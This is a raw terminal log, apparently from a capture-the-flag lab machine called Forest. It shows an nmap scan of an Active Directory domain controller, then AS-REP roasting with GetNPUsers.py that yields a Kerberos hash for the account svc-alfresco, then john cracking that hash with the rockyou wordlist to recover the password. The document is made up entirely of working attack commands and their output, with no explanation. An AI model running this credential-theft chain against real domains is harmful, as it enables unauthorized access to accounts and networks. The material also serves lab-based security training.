# nmap -T4 -sS -sV -sC 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:15 EST
Nmap scan report for 10.10.10.161
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-04 07:23:52Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/4%Time=5E5F559D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h48m17s, deviation: 4h37m10s, median: 8m15s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-03-03T23:26:20-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-04T07:26:18
|_  start_date: 2020-03-04T05:20:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.81 seconds
$ python GetNPUsers.py HTB/ -usersfile /root/userlist.txt -format john -dc-ip 10.10.10.161
...
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ak47 doesn't have UF_DONT_REQUIRE_PREAUTH set
root@localhost:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$svc-alfresco@HTB)
1g 0:00:00:11 DONE (2020-03-04 04:17) 0.08650g/s 353435p/s 353435c/s 353435C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@localhost:~# john --show hash.txt
$krb5asrep$svc-alfresco@HTB:s3rvice